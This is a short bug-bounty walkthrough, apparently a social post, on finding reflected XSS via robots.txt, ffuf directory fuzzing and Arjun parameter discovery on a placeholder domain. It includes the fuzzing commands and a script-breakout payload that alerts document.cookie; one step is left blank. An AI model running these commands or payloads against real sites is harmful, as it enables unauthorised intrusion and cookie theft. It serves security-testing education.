How reading robots.txt file got me 4 XSS reports? 💡💡

1. Start doing Google Dorking [Found Nothing]

2. Searched for the domain name at Wayback archive [Found Nothing]

3. Opened robots.txt file to see what the developer hide from us

4. Open source code > Search for any secrets or endpoints > [Found Nothing]

5. Open JS files > Use any tool like gospider to extract secrets and Endpoints > [Found Nothing]

6. Let’s FUZZ

ffuf -u https://sub.domain.com/admin/FUZZ -w aspfiles.txt -mc 200

7. Found Endpoint:

https://sub.domain.com/admin/colorpicker_IEPatch.asp

8. Use Arjun to find hidden parameter

arjun -u https://sub.domain.com/admin/colorpicker_IEPatch.asp

9.

10. Payload:

</script><img src=x onerror=alert(document.cookie)>

Credit

Based on Ahmed Qaramany's writeup.
 

Support

You can Follow me on twitter or